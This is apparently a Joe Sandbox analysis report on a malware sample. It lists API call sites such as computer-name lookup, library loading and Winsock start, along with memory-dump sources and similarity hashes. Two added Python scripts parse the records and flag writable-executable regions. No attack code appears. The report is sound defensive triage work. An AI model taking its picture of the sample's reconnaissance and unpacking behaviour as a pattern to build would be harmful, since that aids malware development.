• Instruction ID: f3fa2a3d62c89d0934c7a843942bf9466726cfd664081868a0e617947102459b
• Opcode Fuzzy Hash: b5b1d09afb76eea154d2ad20467f7006ff793990be5c92aec61c658cf5829699
• Instruction Fuzzy Hash: E12128715057828FDB218F24C850B26BFE1FF57300F188AA9D4D68B396D7349842DB52
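The "APIs" entries in these function records (imported API, module, argument values where the sandbox resolved them, and the call-site address) are the part of the report an analyst most often wants in structured form. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines in the shape shown on this page (the sample input is constructed from the FreeLibrary, GetComputerNameExA and LoadLibraryExW records here) and decodes the NameType argument of GetComputerNameEx against the Windows COMPUTER_NAME_FORMAT enum. The regular expression for the line layout and the per-API decoder table are assumptions about the report's text, not a documented Joe Sandbox schema.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample input: API reference lines in the shape the report records use
# ("<api>.<module>(<args>), ref: <call-site address>"), copied from this page.
SAMPLE_API_LINES = """
• FreeLibrary.KERNEL32(?), ref: 009CD898
• GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 009CDC43
• LoadLibraryExW.KERNEL32(?,00000000), ref: 009A9D98
• LoadLibraryExW.KERNEL32(?,00000000), ref: 009A9E78
"""

# COMPUTER_NAME_FORMAT from winbase.h: the NameType argument of GetComputerNameEx.
COMPUTER_NAME_FORMAT = {
    0: "ComputerNameNetBIOS",
    1: "ComputerNameDnsHostname",
    2: "ComputerNameDnsDomain",
    3: "ComputerNameDnsFullyQualified",
    4: "ComputerNamePhysicalNetBIOS",
    5: "ComputerNamePhysicalDnsHostname",
    6: "ComputerNamePhysicalDnsDomain",
    7: "ComputerNamePhysicalDnsFullyQualified",
}

# Assumed line layout: optional bullet, API.MODULE(hex args or '?'), ", ref: " hex address.
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[Optional[int]]   # None where the sandbox printed '?'
    ref: int                    # call-site address inside the dumped image
    notes: List[str] = field(default_factory=list)


def _parse_arg(token: str) -> Optional[int]:
    token = token.strip()
    return None if token in ("", "?") else int(token, 16)


def decode_computer_name_ex(args: List[Optional[int]]) -> Optional[str]:
    """Name the NameType value GetComputerNameEx was called with, if it was resolved."""
    if not args or args[0] is None:
        return None
    return COMPUTER_NAME_FORMAT.get(args[0], f"unknown COMPUTER_NAME_FORMAT {args[0]}")


# Per-API argument decoders (assumed table; extend as further records are reviewed).
DECODERS = {
    "GetComputerNameExA": decode_computer_name_ex,
    "GetComputerNameExW": decode_computer_name_ex,
}


def parse_api_line(line: str) -> Optional[ApiRef]:
    """Parse one API reference line; return None for lines that are not API records."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw_args = m.group("args").strip()
    args = [_parse_arg(t) for t in raw_args.split(",")] if raw_args else []
    entry = ApiRef(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))
    decoder = DECODERS.get(entry.api)
    if decoder:
        decoded = decoder(args)
        if decoded:
            entry.notes.append(f"{entry.api} NameType {args[0]} = {decoded}")
    return entry


def parse_api_lines(text: str) -> List[ApiRef]:
    """Parse every API reference line in a block of report text, skipping other lines."""
    parsed = (parse_api_line(line) for line in text.splitlines())
    return [entry for entry in parsed if entry is not None]


def unresolved_argument_count(refs: List[ApiRef]) -> int:
    """Count argument slots the sandbox could not resolve ('?'): a measure of how much
    of the call context still has to be recovered from the memory dump by hand."""
    return sum(a is None for r in refs for a in r.args)


if __name__ == "__main__":
    for r in parse_api_lines(SAMPLE_API_LINES):
        shown = ", ".join("?" if a is None else f"0x{a:X}" for a in r.args)
        print(f"{r.ref:08X}  {r.module}!{r.api}({shown})  {'; '.join(r.notes)}")
```

Feed it the "APIs" block of any function record and it yields one ApiRef per call site; the unresolved-argument count tells you how many values (here the name buffer and size of GetComputerNameExA, and the library name passed to LoadLibraryExW) still have to be read out of the dump rather than from the report.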

Control-flow Graph
(Rendered in the original report as a graph with executed and not-executed blocks colour-coded; the colouring is not recoverable from the extracted text. Basic blocks and edges as recorded, with the API called in a block in parentheses; note that each LoadLibraryExW block is immediately preceded by a self-looping block:)
• 9a9d1e-9a9d34 -> 9a9d40-9a9d52
• 9a9d40-9a9d52 -> 9a9d40-9a9d52 (self-loop), 9a9d54-9a9d7e
• 9a9d54-9a9d7e -> 9a9d80-9a9d92
• 9a9d80-9a9d92 -> 9a9d80-9a9d92 (self-loop), 9a9d94-9a9e13
• 9a9d94-9a9e13 (LoadLibraryExW; call 9dd960) -> 9a9e20-9a9e32
• 9a9e20-9a9e32 -> 9a9e20-9a9e32 (self-loop), 9a9e34-9a9e5e
• 9a9e34-9a9e5e -> 9a9e60-9a9e72
• 9a9e60-9a9e72 -> 9a9e60-9a9e72 (self-loop), 9a9e74-9a9e80
• 9a9e74-9a9e80 (LoadLibraryExW; call 9dd960) -> 9a9e85-9a9e98
• 9a9e85-9a9e98
APIs
• LoadLibraryExW.KERNEL32(?,00000000), ref: 009A9D98
• LoadLibraryExW.KERNEL32(?,00000000), ref: 009A9E78
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                                                                                                                  • Opcode ID: d17e70bff4d785c7748634a469500bf7cf145cdf82b147e9b2dce4f95d6c0cc1
                                                                                                                                                                                                                                  • Instruction ID: a90ebd3c31276c7aa70ca2c04f991544a7985752a9ee0264f365103f9e8e63c7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d17e70bff4d785c7748634a469500bf7cf145cdf82b147e9b2dce4f95d6c0cc1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E411474D003409FE7159F7899D2A5A7F71FB06324F51929CE5902F3A6C631580ACBE2
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CoInitializeEx.COMBASE(00000000,00000002), ref: 009AF09C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Initialize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                                                                                                                  • Opcode ID: e937ecfd58d5b20320681b208f4ca5f8b07d71a88101a0721a4d6ae7fc7f88a6
                                                                                                                                                                                                                                  • Instruction ID: 303c54e501a53b5a67e2d8454c99fbd10b977f2100cec63e82075eef3f425e19
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e937ecfd58d5b20320681b208f4ca5f8b07d71a88101a0721a4d6ae7fc7f88a6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A941D8B4810B40AFD370EF3D9A4B7137EB8AB05250F504B1EF9E6866D4E631A4198BD7
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 009CDD03
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ComputerName
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3545744682-0
                                                                                                                                                                                                                                  • Opcode ID: f5a40c7649902cffc51e149cfe43483b73dbd6d48a4612aa362cc53d287fda28
                                                                                                                                                                                                                                  • Instruction ID: abcce31a22f4f49d8cc23e9f560d01b2e8623e491b8c40110ed84848e41782a8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5a40c7649902cffc51e149cfe43483b73dbd6d48a4612aa362cc53d287fda28
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8221D6705457918FD7268F24C4A0B32BBE1BF5B300F1885DDD4D78B782CA78A841D762
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000), ref: 009DE0E0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: 0ffe9ed7a216e90891f59d8322cff554bde2c31831632b713c45f3c4de756f91
                                                                                                                                                                                                                                  • Instruction ID: 78ae9ef2f1f53aa545c7906ad088b131c1f3f33f728bfec57bc07efa50b0e688
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ffe9ed7a216e90891f59d8322cff554bde2c31831632b713c45f3c4de756f91
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08F0A07286C252FBC3102F28BD06B5B3AB4AFC2720F054836F4009E360DA34EC16D591
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 009AECA3
                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
• Opcode ID: 672d722487d37e22710b1a4d3a2e0423f931410a11ab25d8eb9dd457996e0981
• Instruction ID: 3f8adbcdc817dcc49563178255dcf275d48a2d6bd92e3d33717317ef09a77391
• Opcode Fuzzy Hash: 672d722487d37e22710b1a4d3a2e0423f931410a11ab25d8eb9dd457996e0981
• Instruction Fuzzy Hash: DCE092343EA3827AF63982259CA3F2A31069B42F28E356B06B3213D3D5CAD03501824C
APIs
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: same twelve dump files as listed above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
• Opcode ID: 6a05db80789c23b250a5cf9ef335adbe5c560f8485b861c1ed1f77e0386f852d
• Instruction ID: 4cf99f3bf0c0067d86ef9d63bda3a4fe80e322664ca7f36cb86307761b14c373
• Opcode Fuzzy Hash: 6a05db80789c23b250a5cf9ef335adbe5c560f8485b861c1ed1f77e0386f852d
• Instruction Fuzzy Hash: 62F0D0B4109701CFD344DF24D5A471A7BF4FB88304F10884CE4969B390CB769A48CF82
APIs
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: same twelve dump files as listed above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
• Opcode ID: 97f304605f8b018699711af011a464ec779b97d375ae159be17ba248d6108774
• Instruction ID: 2fc6b4db7f818c885901e97f86aae74fcf90b38ddb06827aaabf9d179585d83c
• Opcode Fuzzy Hash: 97f304605f8b018699711af011a464ec779b97d375ae159be17ba248d6108774
• Instruction Fuzzy Hash: 18F07A7451C3418FD314DF64C5A871BBBE0BB84308F00891DE5998B390C7B59949CF82
APIs
• WSAStartup.WS2_32(00000202,?), ref: 009A9ED2
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: same twelve dump files as listed above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID: Startup
• String ID:
• API String ID: 724789610-0
• Opcode ID: e57ae95bd22024761e9d04c73104e9fcbffd871b039be2d4445b3f7772d4225b
• Instruction ID: e6993ea1586f4e7674f77fc0213ee0be044def36a0dc9c79c2f35273ec46b8bd
• Opcode Fuzzy Hash: e57ae95bd22024761e9d04c73104e9fcbffd871b039be2d4445b3f7772d4225b
• Instruction Fuzzy Hash: CFE02B33694642DBD700DB30EC97E493356DB55345706D429E215D9172EA72A810EA10
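The per-function records in this listing (the `ref:` address on each API line, the `.sdmp` source file with its `Offset`, and the `Similarity` identifiers) are the pieces a triager extracts when mapping sandbox behaviour back to code in the dumped image. The following Python script is an added example and is not Joe Sandbox code: it parses records in this layout from a constructed sample embedded in it (copied from two of the records above), converts each `ref:` virtual address to an RVA using the stated `Offset`, and flags records whose source dump is mapped writable and executable. The field layout of the `.sdmp` file name (the fourth and fifth dotted fields read as region base and Windows page protection) is an assumption made from the values on the page, not a documented Joe Sandbox format; only the protection decoding depends on it.

```python
"""Parse Joe Sandbox per-function records (APIs / Memory Dump Source /
Joe Sandbox IDA Plugin / Similarity) into dicts and derive triage data:
API call sites as RVAs and which records live in writable+executable memory.

Added example, not Joe Sandbox code. SAMPLE is constructed from two records
of the report, in the report's own layout.
"""
import re
from typing import Dict, List

# Windows page-protection constants (winnt.h).
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
HEADERS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "WSAStartup.WS2_32(00000202,?), ref: 009A9ED2"
API_RE = re.compile(r"^(?P<name>\w+)\.(?P<module>[\w.]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
# "Source File: <name>.sdmp, Offset: 009A0000, based on PE: true"
SOURCE_RE = re.compile(r"^Source File:\s*(?P<file>\S+?),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>\w+)$")

SAMPLE = """\
APIs
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
• Instruction Fuzzy Hash: 62F0D0B4109701CFD344DF24D5A471A7BF4FB88304F10884CE4969B390CB769A48CF82
APIs
• WSAStartup.WS2_32(00000202,?), ref: 009A9ED2
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID: Startup
• String ID:
• API String ID: 724789610-0
• Instruction Fuzzy Hash: CFE02B33694642DBD700DB30EC97E493356DB55345706D429E215D9172EA72A810EA10
"""


def parse_records(text: str) -> List[Dict]:
    """Split report text into one dict per function record; a record starts at an 'APIs' header."""
    records: List[Dict] = []
    current, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            section = line
            if line == "APIs":
                current = {"apis": [], "dump": {}, "associated": [], "snapshot": None, "similarity": {}}
                records.append(current)
            continue
        if current is None or not line.startswith("•"):
            continue  # not a field line
        body = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                current["apis"].append({"name": m["name"], "module": m["module"],
                                        "args": [a.strip() for a in m["args"].split(",")],
                                        "va": int(m["ref"], 16)})
        elif section == "Memory Dump Source":
            m = SOURCE_RE.match(body)
            if m:
                current["dump"] = {"file": m["file"], "offset": int(m["offset"], 16),
                                   "based_on_pe": m["pe"].lower() == "true"}
            elif body.startswith("Associated:"):
                current["associated"].append(body.split(":", 1)[1].strip())
        elif section == "Joe Sandbox IDA Plugin":
            current["snapshot"] = body.split(":", 1)[1].strip()
        elif section == "Similarity":
            key, _, value = body.partition(":")
            current["similarity"][key.strip()] = value.strip()
    return records


def decode_sdmp(filename: str) -> Dict:
    """ASSUMPTION: fields[3] is the region base and fields[4] the page protection
    of a dump name; this layout is inferred from the values on the page."""
    stem = filename[:-5] if filename.endswith(".sdmp") else filename
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"unexpected sdmp name: {filename}")
    prot = int(fields[4], 16)
    return {"region_base": int(fields[3], 16), "protection": PAGE_PROTECTION.get(prot, hex(prot)),
            "raw_fields": fields}


def api_rvas(record: Dict) -> List[Dict]:
    """Rebase each API call site from the dump's load address to an RVA usable in IDA/Ghidra."""
    base = record["dump"].get("offset")
    return [{"api": f"{a['module']}!{a['name']}", "va": a["va"],
             "rva": a["va"] - base if base is not None else None} for a in record["apis"]]


def rwx_records(records: List[Dict]) -> List[str]:
    """API IDs of records whose source dump is writable and executable (a common unpacking indicator)."""
    rwx = {"PAGE_EXECUTE_READWRITE", "PAGE_EXECUTE_WRITECOPY"}
    return [r["similarity"].get("API ID", "?") for r in records
            if r["dump"].get("file") and decode_sdmp(r["dump"]["file"])["protection"] in rwx]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r["similarity"].get("API ID"), api_rvas(r), decode_sdmp(r["dump"]["file"])["protection"])
    print("RWX records:", rwx_records(recs))
```

For the WSAStartup record the script yields RVA 0x9ED2 for the call site, which is the offset to open in a disassembler on the dumped image, and the first argument 0x0202 is the Winsock version requested (2.2). The source dump's protection field decodes to PAGE_EXECUTE_READWRITE on an image-backed region, which is the kind of writable code mapping an unpacker leaves behind; the `Associated` entry at 009A0000 decodes to PAGE_READWRITE, consistent with a PE header page.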
APIs
• RtlFreeHeap.NTDLL(?,00000000,?,009DE0F9), ref: 009DC590
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: same twelve dump files as listed above
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
                                                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                                                                  • Opcode ID: 9acdc0d0d6b51a79aabd0bb881f217dc8fd655a8d9b77db7017aa7536e9d438b
                                                                                                                                                                                                                                  • Instruction ID: 5407a24aa78b3f9ad12eb483f3c17d8503b267c81eeb1d0639f381dc4170b827
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9acdc0d0d6b51a79aabd0bb881f217dc8fd655a8d9b77db7017aa7536e9d438b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70D0C931869122EBCA102F28BC16BD73A54AF49720F074892B404AA274C624EC91DAD0
APIs
• RtlAllocateHeap.NTDLL(?,00000000), ref: 009DC561
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 4f74319c88a65ba9e036ac513fd8a3d58ad6e0a422628a14faf4309715fb9dd7
• Instruction ID: 2207b2876a40698fecdb7622cd36a81f32f29d05b6a1b6e7c4a012ee4377b3a7
• Opcode Fuzzy Hash: 4f74319c88a65ba9e036ac513fd8a3d58ad6e0a422628a14faf4309715fb9dd7
• Instruction Fuzzy Hash: 71A00271199110DFDE562F24FC09FD47B21EB58721F134192F101990F6C771DC92EA84
APIs
• VirtualAlloc.KERNELBASE(00000000), ref: 009F9BF1
Memory Dump Source
• Source File: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
